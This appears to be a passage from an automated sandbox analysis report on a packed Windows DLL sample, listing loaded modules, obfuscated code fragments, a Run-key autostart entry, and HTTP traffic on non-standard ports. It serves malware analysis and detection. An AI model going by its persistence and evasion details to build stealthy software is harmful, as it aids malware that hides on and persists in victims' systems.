Source: C:\Windows\System32\loaddll32.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2351563967.0000000003488000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*V source: rundll32.exe, 00000004.00000003.2331092028.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*k source: rundll32.exe, 00000004.00000003.2331092028.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: rundll32.exe, 00000004.00000003.2298221763.0000000003429000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\*.*.*I source: rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: rundll32.exe, 00000004.00000003.2272862369.000000000342C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2474003270.0000000003488000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2353062409.0000000003488000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*e source: rundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*T7 source: rundll32.exe, 00000004.00000003.1948233905.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948360391.000000000346D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000004.00000003.2272781039.0000000006591000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: rundll32.exe, 00000004.00000003.2271634293.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2271351006.0000000003448000.00000004.00000020.00020000.00000000.sdmp
Source: initial sampleStatic PE information: section where entry point is pointing to: .tyi1
Source: 2JSGOlbNym.dllStatic PE information: section name: .tyi0
Source: 2JSGOlbNym.dllStatic PE information: section name: .tyi1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10025852 push dword ptr [esp+18h]; retn 001Ch4_2_10038D5D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003A5AF pushfd ; mov dword ptr [esp], 1002856Bh4_2_1003A636
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003A5AF pushfd ; mov dword ptr [esp], esi4_2_1003A63E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003A5AF push dword ptr [esp+24h]; retn 0028h4_2_1003A647
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002870D push 772B26FEh; mov dword ptr [esp], 100152B0h4_2_10032CA7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10029004 push dword ptr [esp+30h]; retn 0034h4_2_10029013
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10027005 push dword ptr [esp+04h]; retn 0008h4_2_10027895
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002D008 push dword ptr [esp+50h]; retn 0058h4_2_1002D027
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002500F push eax; mov dword ptr [esp], 7A0B7BF6h4_2_10025033
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002500F push dword ptr [esp+48h]; retn 004Ch4_2_1002503F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002D00D push dword ptr [esp+50h]; retn 0058h4_2_1002D027
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10039013 push dword ptr [esp+48h]; retn 004Ch4_2_1003901E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10029016 pushfd ; mov dword ptr [esp], BCEE200Eh4_2_1002903B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10031016 push dword ptr [esp+2Ch]; retn 0030h4_2_10031043
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002501B push eax; mov dword ptr [esp], 7A0B7BF6h4_2_10025033
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002501B push dword ptr [esp+48h]; retn 004Ch4_2_1002503F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10031027 push dword ptr [esp+2Ch]; retn 0030h4_2_10031043
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003702A push dword ptr [esp+4Ch]; retn 0050h4_2_10037035
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1001F02E push dword ptr [esp+20h]; retn 0024h4_2_10020172
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10021034 push dword ptr [esp+50h]; retn 0054h4_2_10021047
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002B039 push dword ptr [esp+50h]; retn 0054h4_2_1002A39A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002B039 push dword ptr [esp+04h]; retn 0008h4_2_1002B04E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002F042 push dword ptr [esp+28h]; retn 002Ch4_2_1003ADE1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1003B053 push dword ptr [esp+34h]; retn 0038h4_2_1003B079
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002F051 push dword ptr [esp+40h]; retn 0044h4_2_100370B8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10021054 push dword ptr [esp+34h]; retn 0038h4_2_1003603D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002105E push dword ptr [esp+44h]; retn 0048h4_2_1003A0D4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10022FEE pushfd ; mov dword ptr [esp], ebx4_2_1003B2C1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10022FEE push dword ptr [esp+44h]; retn 0048h4_2_1003B2D7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10023064 push dword ptr [esp+58h]; retn 005Ch4_2_10023076
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1002706A push 5AF143D8h; mov dword ptr [esp], ebx4_2_100270E0
Source: 2JSGOlbNym.dllStatic PE information: section name: .tyi1 entropy: 7.938472536073559

Boot Survival

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run COAPIJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run COAPIJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run COAPIJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 18530
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 18530
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 18963
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 18963
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
